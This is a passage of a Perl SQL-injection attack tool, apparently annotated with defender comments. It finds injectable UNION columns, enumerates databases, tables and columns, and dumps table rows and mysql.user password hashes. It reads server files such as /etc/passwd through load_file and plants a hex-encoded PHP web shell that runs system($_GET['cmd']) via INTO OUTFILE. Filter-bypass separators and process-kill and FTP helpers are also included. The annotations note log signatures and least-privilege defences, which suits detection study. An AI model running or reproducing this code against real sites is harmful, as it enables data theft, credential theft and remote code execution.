       # For each count from 2 to 200 one request is sent whose UNION SELECT list
       # consists of char()-encoded "RATSXPDOWN<n>RATSXPDOWN" markers; a marker that
       # comes back in the response body identifies a reflected column.
       # Defensive reading: up to 199 consecutive requests to the same URL, each with
       # a longer list of char(...) values than the previous one, is a distinctive
       # access-log pattern; the marker text itself is char()-encoded in the request
       # and appears in clear only in the response.
  558. print "\n[+] Looking for the number of columns\n\n";
       # This lexical $rows is shadowed by the loop variable below.
  559. my $rows  = "0";
  560. my $asc;
  561. my $page = $_[0];
  562. ($pass1,$pass2) = &bypass($_[1]);
  563.  
  564. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  565. $total = "1";
  566. for my $rows(2..200) {
  567. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  568. $total.= ",".$rows;
  569. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  570. $test = toma($injection);
  571. if ($test=~/RATSXPDOWN/) {
       # @number collects the column positions whose marker was echoed back.
  572. @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  573. $control = 1;
  574. my $save = partimealmedio($_[0]);
  575. savefile($save.".txt","\n[Target confirmed] : $page");
  576. savefile($save.".txt","[Bypass] : $_[1]\n");
  577. savefile($save.".txt","[Limit] : The site has $rows columns");
  578. savefile($save.".txt","[Data] : The number @number print data");
       # The first reflected position in the numeric column list is replaced by the
       # placeholder word "hackman", which the other subs substitute later.
  579. $total=~s/$number[0]/hackman/;
  580. savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  581. return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  582. }
  583. }
  584. }
  585.  
  586. sub details {
       # Reports what the database account behind an injectable URL can reach.
       #   $page    URL containing the "hackman" placeholder
       #   $bypass  bypass token, $save  log file base name
       # Does nothing when $page has no placeholder. Otherwise it sends four requests
       # and looks for the marker "ERTOR854" (the value of char(69,82,84,79,82,56,53,52))
       # in each response:
       #   - a select from information_schema.tables
       #   - a select from mysql.user
       #   - load_file() of the hex literal 0x2f6574632f706173737764 ("/etc/passwd")
       #   - version(), database() and user()
       # Results are printed and appended to "<save>.txt" through savefile().
       # Defensive reading: each "ON" result corresponds to a privilege the web
       # application's database account should not need - read access to mysql.user
       # and the FILE privilege in particular.
  587. my ($page,$bypass,$save) = @_;
  588. ($pass1,$pass2) = &bypass($bypass);
  589. savefile($save.".txt","\n");
  590. if ($page=~/(.*)hackman(.*)/ig) {
  591. print "\n[+] Searching information..\n\n";
       # Text before and after the placeholder in the prepared URL.
  592. my  ($start,$end) = ($1,$2);
  593. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  594. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  595. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  596. $test1 = toma($inforschema);
  597. $test2 = toma($mysqluser);
  598. if ($test2=~/ERTOR854/ig) {
  599. savefile($save.".txt","[mysql.user] : ON");
  600. print "[mysql.user] : ON\n";
  601. } else {
  602. print "[mysql.user] : OFF\n";
  603. savefile($save.".txt","[mysql.user] : OFF");
  604. }
  605. if ($test1=~/ERTOR854/ig) {
  606. print "[information_schema.tables] : ON\n";
  607. savefile($save.".txt","[information_schema.tables] : ON");
  608. } else {
  609. print "[information_schema.tables] : OFF\n";
  610. savefile($save.".txt","[information_schema.tables] : OFF");
  611. }
       # Unlike the two checks above, a negative load_file result is neither printed nor logged.
  612. if ($test3=~/ERTOR854/ig) {
  613. print "[load_file] : ON\n";
  614. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  615. }
  616. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  617. $injection = $start.$concat.$end.$pass2;
  618. $code = toma($injection);
  619. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  620. print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
  621. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  622. } else {
  623. print "\n[-] Not found any data\n";
  624. }
  625. }
  626. }
  627.  
  628. sub menu_options {
       # Interactive sub-menu for one target.
       #   $_[0]  URL containing the "hackman" placeholder
       #   $_[1]  bypass token
       # (a third argument is passed by some callers but not read; $save is
       # recomputed from $_[0]).
       # Reads one line from STDIN and dispatches on unanchored regex matches, so the
       # order of the branches decides which one wins when a line matches several.
       # Most branches finish with "&reload;", which calls this sub again.
       # The schema*, mysqluser, into, loadfile and dump subs are defined outside the
       # visible part of the file, apart from schematables and schemacolumns.
  629.  
  630. my $save = partimealmedio($_[0]);
  631. print "\n/logs/webs/$save>";
  632. chomp (my $rta = <stdin>);
  633.  
  634. if ($rta=~/help/) {
  635. print qq(
  636.  
  637. Commands :
  638.  
  639. details
  640. tables
  641. columns <table>
  642. dbs
  643. othertable <db>
  644. othercolumn <db> <table>          
  645. mysqluser
  646. dumper <table> <column1> <column2>
  647. createshell
  648. readfile
  649. logs
  650. exit
  651.  
  652. );
  653. }
  654.  
  655.  
  656. if ($rta =~/tables/) {
  657. schematables($_[0],$_[1],$save);
  658. &reload;   
  659. }
  660. elsif ($rta =~/columns (.*)/) {
  661. my $tabla = $1;
  662. schemacolumns($_[0],$_[1],$save,$tabla);
  663. &reload;
  664. }
  665. elsif ($rta =~/dbs/) {
  666. &schemadb($_[0],$_[1],$save);
  667. &reload;
  668. }
  669. elsif ($rta =~/othertable (.*)/) {
  670. my $data = $1;
  671. &schematablesdb($_[0],$_[1],$data,$save);
  672. &reload;
  673. }
  674. elsif ($rta =~/othercolumn (.*) (.*)/){
  675. my ($db,$table) = ($1,$2);
  676. &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
  677. &reload;
  678. }
  679. elsif ($rta =~/mysqluser/) {
  680. &mysqluser($_[0],$_[1],$save);
  681. &reload;
  682. }
  683. elsif ($rta=~/logs/) {
       # Opens the per-target log with the Windows "start" command.
       # NOTE(review): $save is derived from the target URL by partimealmedio() and is
       # interpolated into a shell command line here; whether that helper restricts
       # the characters it returns cannot be seen from this part of the file.
  684. $t = "logs/webs/$save.txt";
  685. system("start $t");
  686. &reload;
  687. }
  688. elsif ($rta=~/exit/) {
       # No loop encloses this statement inside the sub, so "next" is resolved
       # against a loop in a calling frame (the while(1) loop at top level).
  689. next;
  690. }
  691.  
  692. elsif($rta=~/createshell/) {
  693. print "\n\n[Full Path Discloure] : ";
  694. chomp(my $path = <STDIN>);
  695. &into($_[0],$_[1],$path,$save);
  696. }
  697. elsif($rta=~/readfile/) {
  698. loadfile($_[0],$_[1],$save);
  699. }
  700. elsif ($rta=~/dumper (.*) (.*) (.*)/) {
  701. my ($tabla,$col1,$col2) = ($1,$2,$3);
  702. &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
  703. &reload;
  704. }
  705. elsif ($rta =~/details/) {
  706. &details($_[0],$_[1],$save);
  707. &reload;
  708. }
  709. else {
  710. &reload;
  711. }
  712. }
  713.  
  714.  
  715.  
  716. sub schematables {
       # Lists table names through information_schema.tables for a prepared URL.
       #   $page    URL containing the "hackman" placeholder
       #   $bypass  bypass token, $save  log file base name
       # Two copies of the URL are built: $page1 asks for Count(*), $page asks for
       # table_name, each wrapped in the char()-encoded marker "RATSXPDOWN1".
       # The count is fetched once; then one request per row is sent using
       # "limit <n>,1", and every name found is printed and written to "<save>.txt".
       # Defensive reading: a run of requests that differ only in an incrementing
       # "limit N,1" value against information_schema is a clear log signature, and
       # it only works when the injected parameter is not bound.
  717. $real = "1";
  718. my ($page,$bypass,$save) = @_;
  719. savefile($save.".txt","\n");
  720. print "\n";
  721. my $page1 = $page;
  722. ($pass1,$pass2) = &bypass($_[1]);
  723. savefile($save.".txt","[DB] : default");
  724. print "\n[+] Searching tables with schema\n\n";
  725. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  726. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  727. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
  728. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  729. my $resto = $1;
       # NOTE(review): the constant 17 is not explained in the source; presumably it
       # is meant to skip the server's own information_schema entries - TODO confirm.
  730. $total = $resto - 17;
  731. print "[+] Tables Length :  $total\n\n";
  732. savefile($save.".txt","[+] Searching tables with schema\n");
  733. savefile($save.".txt","[+] Tables Length :  $total\n");
  734. my $limit = $1;
       # The loop variable shadows the $limit above, which only supplies the upper bound.
  735. for my $limit(17..$limit) {
  736. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
  737. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  738. my $table = $1;
  739. chomp $table;
  740. print "[Table $real Found : $table ]\n";
  741. savefile($save.".txt","[Table $real Found : $table ]");
  742. $real++;
  743. }}
  744. print "\n";
  745. } else {
  746. print "\n[-] information_schema = ERROR\n";
  747. }    
  748. }
  749.  
  750. sub reload {
       # Re-enters menu_options() with the first argument only.
       # Callers invoke this as "&reload;" (no parentheses), which makes the caller's
       # current @_ visible here, so $_[0] is the caller's first argument. The bypass
       # token ($_[1]) is not forwarded. Each call adds a stack frame, because
       # menu_options() and reload() call each other rather than looping.
  751. &menu_options($_[0]);
  752. }
  753.  
  754.  
  755. sub schemacolumns {
       # Lists the column names of one table through information_schema.columns.
       #   $page    URL containing the "hackman" placeholder
       #   $bypass  bypass token, $save  log file base name, $table  table name
       # The table name is passed to the server as char(<ascii($table)>), i.e. as a
       # list of character codes rather than a quoted string. A Count(*) request gives
       # the number of columns, then one "limit <n>,1" request per index from 0 up to
       # and including that count fetches each column_name. Results are printed and
       # written to "<save>.txt".
       # Defensive reading: the same incrementing-limit request pattern as in
       # schematables, here with a "table_name=char(...)" condition in the URL.
  756. my ($page,$bypass,$save,$table) = @_;
  757. my $page3 = $page;
  758. my $page4 = $page;
  759. savefile($save.".txt","\n");
  760. print "\n";
  761. ($pass1,$pass2) = &bypass($bypass);
  762. print "\n[DB] : default\n";
  763. savefile($save.".txt","[DB] : default");
  764. savefile($save.".txt","[Table] : $table\n");
  765. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  766. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
  767. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  768. print "\n[Columns Length : $1 ]\n\n";
  769. savefile($save.".txt","[Columns Length : $1 ]\n");
  770. my $si = $1;
  771. chomp $si;
  772. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  773. $real = "1";
  774. for my $limit2(0..$si) {
  775. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  776. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  777. print "[Column $real] : $1\n";
  778. savefile($save.".txt","[Column $real] : $1");
  779. $real++;
  780. }}
  781. print "\n";
  782. } else {
  783. print "\n[-] information_schema = ERROR\n";
  784. }}
  785.  
# List database (schema) names by querying information_schema.schemata
# through the injectable URL in $page.
#
#   $page   - URL containing the literal placeholder "hackman"
#   $bypass - separator style, translated by bypass() into $pass1/$pass2
#   $save   - base name of the log file (savefile() writes logs/webs/$save.txt)
#
# Names equal to "information_schema", "mysql" or "phpmyadmin" are skipped
# in the output.
#
# Defender notes: requests carry "information_schema.schemata" plus the
# char(82,65,84,83,88,80,68,79,87,78,49) marker (RATSXPDOWN1). A burst of
# near-identical requests that differ only in the "limit N,1" offset is the
# access-log pattern this loop produces.
#
# Writes the package globals $pass1, $pass2, $code and $real.
sub schemadb {
    my ($page,$bypass,$save) = @_;
    my $page1 = $page;
    savefile($save.".txt","\n");
    print "\n\n[+] Searching DBS\n\n";
    ($pass1,$pass2) = &bypass($bypass);
    # Count request. Note that it is sent without the $pass2 terminator.
    $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
        my $limita = $1;
        print "[+] Databases Length : $limita\n\n";
        savefile($save.".txt","[+] Databases Length : $limita\n");
        $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
        $real = "1";
        for my $limit(0..$limita) {
            $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
            if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
                my $control = $1;
                if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
                    print "[Database $real Found] $control\n";
                    savefile($save.".txt","[Database $real Found] : $control");
                    $real++;
                }
            }
        }
        print "\n";
    } else {
        print "[-] information_schema = ERROR\n";
    }
}
  816.  
# List the tables of one database by querying information_schema.tables
# filtered on table_schema.
#
# Positional arguments:
#   $_[0] - URL containing the literal placeholder "hackman"
#   $_[1] - separator style, translated by bypass() into $pass1/$pass2
#   $_[2] - database name, sent as char(<code points>) via ascii()
#   $_[3] - base name of the log file (savefile() writes logs/webs/<name>.txt)
#
# Defender notes: requests carry "information_schema.tables", a
# "table_schema=char(...)" filter and the RATSXPDOWN1 marker spelled as
# char(82,65,84,...). Any of these in a query string is worth alerting on.
#
# Writes the package globals $pass1, $pass2, $code, $code1 and $real.
sub schematablesdb {
    my $page = $_[0];
    my $db = $_[2];
    my $page1 = $page;
    savefile($_[3].".txt","\n");
    print "\n\n[+] Searching tables with DB $db\n\n";
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($_[3].".txt","[DB] : $db");
    $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
    #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
        print "[+] Tables Length :  $1\n\n";
        savefile($_[3].".txt","[+] Tables Length :  $1\n");
        my $limit = $1;
        $real = "1";
        # One table_name per request, paged with "limit N,1".
        for my $lim(0..$limit) {
            $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
            #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
            if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
                my $table = $1;
                chomp $table;
                savefile($_[3].".txt","[Table $real Found : $table ]");
                print "[Table $real Found : $table ]\n";
                $real++;
            }}
        print "\n";
    } else {
        print "\n[-] information_schema = ERROR\n";
    }}
  848.  
# List the columns of $table inside database $db by querying
# information_schema.columns filtered on table_name and table_schema.
#
#   $page   - URL containing the literal placeholder "hackman"
#   $bypass - separator style, translated by bypass() into $pass1/$pass2
#   $db     - database name, sent as char(<code points>) via ascii()
#   $table  - table name, sent the same way
#   $save   - base name of the log file (savefile() writes logs/webs/$save.txt)
#
# Defender notes: same request signature as the other schema* subs
# ("information_schema.columns" plus the char(82,65,84,...) RATSXPDOWN1
# marker). Restricting what the application's DB account may read limits
# what these requests can return.
#
# Writes the package globals $pass1, $pass2, $code3, $code4 and $real.
sub schemacolumnsdb {
    my ($page,$bypass,$db,$table,$save) = @_;
    my $page3 = $page;
    my $page4 = $page;
    print "\n\n[+] Searching columns in table $table with DB $db\n\n";
    savefile($save.".txt","\n");
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($save.".txt","\n[DB] : $db");
    savefile($save.".txt","[Table] : $table");
    $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
    if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
        print "\n[Columns length : $1 ]\n\n";
        savefile($save.".txt","[Columns length : $1 ]\n");
        my $si = $1;
        chomp $si;
        $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
        $real = "1";
        for my $limit2(0..$si) {
            $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
            if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
                print "[Column $real] : $1\n";
                savefile($save.".txt","[Column $real] : $1");
                $real++;
            }
        }
    } else {
        print "\n[-] information_schema = ERROR\n";
    }
    print "\n";
}
  880.  
# Read Host, User and Password rows from the mysql.user table through the
# injectable URL in $page, printing them and appending them to
# logs/webs/$save.txt.
#
#   $page   - URL containing the literal placeholder "hackman"
#   $bypass - separator style, translated by bypass() into $pass1/$pass2
#   $save   - base name of the log file
#
# Flow: a probe request checks that mysql.user is readable at all, a second
# request reads Count(*), then one row is fetched per request.
#
# Defender notes: this only succeeds when the application's database account
# can SELECT from the mysql schema, so a least-privilege account defeats it.
# The requests contain "mysql.user" and the RATSXPDOWN marker, here spelled
# both as char(82,65,84,...) and as the hex literal 0x524154535850444f574e.
#
# Writes the package globals $pass1, $pass2, $code and $code1.
sub mysqluser {
    my ($page,$bypass,$save) = @_;
    my $cop = $page;
    my $cop1 = $page;
    savefile($save.".txt","\n");
    print "\n\n[+] Finding mysql.users\n";
    ($pass1,$pass2) = &bypass($bypass);
    # Probe: is mysql.user readable?
    $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
    $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
    if ($code=~/RATSXPDOWN/ig){
        $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
        $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
        if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
            print "\n[+] Users Found : $1\n\n";
            savefile($save.".txt","\n[+] Users mysql Found : $1\n");
            for my $limit(0..$1) {
                # The substitution only has an effect on the first pass;
                # afterwards "hackman" is no longer present in $cop.
                $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
                $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
                if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
                    print "[Host] : $1 [User] : $2 [Password] : $3\n";
                    savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
                } else {
                    print "\n";
                    &reload;
                }
            }
        }
    } else {
        print "\n[-] mysql.user = ERROR\n\n";
    }
}
  912.  
# Read two columns of one table row by row through the injectable URL.
#
# Positional arguments:
#   $_[0] - URL containing the literal placeholder "hackman"
#   $_[1] - first column name
#   $_[2] - second column name
#   $_[3] - table name
#   $_[4] - separator style, translated by bypass() into $pass1/$pass2
#   $_[5] - base name of the log file (savefile() writes logs/webs/<name>.txt)
#
# Values are wrapped in the marker ERTOR854 (spelled as
# char(69,82,84,79,82,56,53,52)) and scraped from the response body.
#
# Defender notes: the marker sequence char(69,82,84,79,82,56,53,52) and the
# repeated "limit N,1" paging are the request-side signature of this sub.
#
# Writes the package globals $pass1, $pass2, $concatx, $val_code, $concat,
# $tota and $injection.
sub dump {
    savefile($_[5].".txt","\n");
    my $page = $_[0];
    ($pass1,$pass2) = &bypass($_[4]);
    if ($page=~/(.*)hackman(.*)/){
        my $start = $1;
        my $end = $2;
        print "\n\n[+] Extracting values...\n\n";
        # Row count first, then the two-column expression used per row.
        $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
        $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
        $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
        if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
            $tota = $1;
            print "[+] Table : $_[3]\n";
            print "[+] Length of the rows : $tota\n\n";
            print "[$_[1]] [$_[2]]\n\n";
            savefile($_[5].".txt","[Table] : $_[3]");
            savefile($_[5].".txt","[+] Length of the rows: $tota\n");
            savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
            for my $limit(0..$tota) {
                chomp $limit;
                $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
                if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
                    savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
                    print "[$_[1]] : $1   [$_[2]] : $2\n";
                } else {
                    print "\n\n[+] Extracting Finish\n\n";
                    last;
                    # NOTE(review): unreachable, `last` above already left the loop.
                    &reload;
                }
            }
        } else {
            print "[-] Not Found any DATA\n\n";
        }}}
  947.  
  948.  
# Ask the operator for a file path and try to read that file from the
# database host with MySQL's load_file(), through the injectable URL.
#
# Positional arguments:
#   $_[0] - URL containing the literal placeholder "hackman"
#   $_[1] - separator style, translated by bypass() into $pass1/$pass2
#   $_[2] - base name of the log file (savefile() writes logs/webs/<name>.txt)
#
# The path is hex-encoded with encode() and the result is wrapped in the
# marker k0bra (spelled as char(107,48,98,114,97)).
#
# Defender notes: load_file() needs the FILE privilege and is further limited
# by the server's secure_file_priv setting, so withholding FILE from the
# application's account blocks this. Requests containing "load_file(" or the
# char(107,48,98,114,97) marker are a clear signature.
#
# Writes the package globals $pass1, $pass2 and $concat. It always ends by
# calling reload.
sub loadfile {
    savefile($_[2].".txt","\n");
    ($pass1,$pass2) = &bypass($_[1]);
    if ($_[0] =~/(.*)hackman(.*)/g) {
        my $start = $1; my $end = $2;
        print "\n\n[+] File to read : ";
        chomp (my $file = <stdin>);
        $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
        my $code = toma($start.$concat.$end.$pass2);
        chomp $code;
        # /s lets the capture span newlines, since the file body is multi-line.
        if ($code=~/k0bra(.*)k0bra/s) {
            print "[File Found] : $file\n";
            print "\n[Source Start]\n\n";
            print $1;
            print "\n\n[Source End]\n\n";
            savefile($_[2].".txt","[File Found] : $file");
            savefile($_[2].".txt","\n[Source Start]\n");
            savefile($_[2].".txt","$1");
            savefile($_[2].".txt","\n[Source End]\n");
        }}
    &reload;
}
  971.  
  972.  
# Try to make the database server write a PHP file named shell.php under
# $dir using SELECT ... INTO OUTFILE, then request that file over HTTP to
# see whether it was created.
#
#   $page   - URL containing the literal placeholder "hackman"
#   $bypass - separator style, translated by bypass() into $pass1/$pass2
#   $dir    - server-side directory supplied by the caller
#   $save   - base name of the log file (savefile() writes logs/webs/$save.txt)
#
# The long 0x... literal is the hex-encoded file content. The success check
# below looks for its page title, "Mini Shell By Doddy".
#
# Defender notes:
#   * INTO OUTFILE needs the FILE privilege and honours secure_file_priv,
#     and the web root must be writable by the database server's OS account.
#     Denying any one of these stops the write.
#   * Signatures: "into", "outfile" and a long 0x literal in a request
#     parameter; a new shell.php in a served directory; responses containing
#     "Mini Shell By Doddy".
#
# Writes the package globals $pass1, $pass2, $shell, $code and $code1. It
# always ends by calling reload.
sub into {
    print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
    my ($page,$bypass,$dir,$save) = @_;
    savefile($save.".txt","\n");
    print "\n";
    ($pass1,$pass2) = &bypass($bypass);
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
    if ($path=~/\/(.*)$/) {
        my $path1 = $1;
        my $path2 = $path1;
        # NOTE(review): $path1 is interpolated into both patterns unescaped,
        # so regex metacharacters in the URL path change what is removed.
        $path2 =~s/$1//;
        $dir =~s/$path1//ig;
        $shell = $dir."/"."shell.php";
        if ($page =~/(.*)hackman(.*)/ig) {
            my  ($start,$end) = ($1,$2);
            $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
            # Verification request for the file the previous request tried to create.
            $code1 = toma("http://".$auth."/".$path2."/"."shell.php");
            if ($code1=~/Mini Shell By Doddy/ig) {
                print "[shell up] : http://".$auth."/".$path2."/"."shell.php\a";
                savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
            } else {
                print "[shell] : Not Found\n";
            }
        }
    }
    print "\n\n";
    &reload;
}
  1001.  
  1002.  
  1003. sub bypass {
  1004. if ($_[0] eq "/*") { return ("/**/","/*"); }
  1005. elsif ($_[0] eq "%20") { return ("%20","%00"); }
  1006. else {return ("+","--");}}
  1007.  
  1008. sub ascii {
  1009. return join ',',unpack "U*",$_[0];
  1010. }
  1011.  
  1012. sub base {
  1013. $re = encode_base64($_[0]);
  1014. chomp $re;
  1015. return $re;
  1016. }
  1017.  
  1018. sub base_de {
  1019. $re = decode_base64($_[0]);
  1020. chomp $re;
  1021. return $re;
  1022. }
  1023.  
  1024.  
# Mirror the URL in $_[0] to the local path $_[1] through the shared user
# agent $nave (created outside this excerpt, presumably an LWP::UserAgent),
# and report whether the local file exists afterwards.
# Returns the bareword `true`, which is the string "true" while strict is off.
# NOTE(review): there is no explicit return on the failure paths, so the
# result is then whatever the last evaluated condition produced. Callers
# should only test it for truth.
sub download {
    if ($nave->mirror($_[0],$_[1])) {
        if (-f $_[1]) {
            return true;
        }}}
  1030.  
  1031.  
  1032. sub hex_en {
  1033. my $string = $_[0];
  1034. $hex = '0x';
  1035. for (split //,$string) {
  1036. $hex .= sprintf "%x", ord;
  1037. }
  1038. return $hex;
  1039. }
  1040.  
  1041. sub hex_de {
  1042. my $text = shift;
  1043. $text =~ s/^0x//;
  1044. $encode = join q[], map { chr hex } $text =~ /../g;
  1045. return $encode;
  1046. }
  1047.  
  1048. sub ascii_de {
  1049. my $text = shift;
  1050. $text = join q[], map { chr } split q[,],$text;
  1051. return $text;
  1052. }
  1053.  
  1054. sub getprocess {
  1055.  
  1056. my %procesos;
  1057.  
  1058. my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
  1059. my $dos = $uno->ConnectServer("","root\\cimv2");
  1060.  
  1061. foreach my $pro (in $dos->InstancesOf("Win32_Process")){
  1062. $procesos{$pro->{Caption}} = $pro->{ProcessId};
  1063. }
  1064. return %procesos;
  1065. }
  1066.  
  1067. sub killprocess {
  1068.  
  1069. my $pid = shift;
  1070.  
  1071. if (Win32::Process::KillProcess($pid,"")) {
  1072. return true;
  1073. } else {
  1074. return false;
  1075. }
  1076. }
  1077.  
  1078. sub getip {
  1079. my $get = gethostbyname($_[0]);
  1080. return inet_ntoa($get);
  1081. }
  1082.  
  1083.  
  1084.  
# Minimal interactive FTP client on top of Net::FTP.
#
#   $ftp  - host to connect to
#   $user - login name
#   $pass - password
#
# After a successful login it prompts with "ftp>" and reads one command per
# round from standard input, looping with `goto menu`.
#
# NOTE(review):
#   * Commands are matched with unanchored regexes, so one input line can
#     trigger several branches: "mkdir x" and "rmdir x" also match /dir/ and
#     produce a directory listing first.
#   * "exit" and "quit" use `next` although there is no enclosing loop in
#     this sub, so control leaves the sub through whatever loop the caller
#     is running.
#   * "get" and "put" need two arguments, while the help text shows one.
#   * The connection made by Net::FTP->new is never closed explicitly.
#   * Plain FTP sends credentials unencrypted (assuming Net::FTP defaults).
sub ftp {

    my ($ftp,$user,$pass) = @_;

    if (my $socket = Net::FTP->new($ftp)) {
        if ($socket->login($user,$pass)) {

            print "\n[+] Enter of the server FTP\n\n";

            menu:

            print "\n\nftp>";
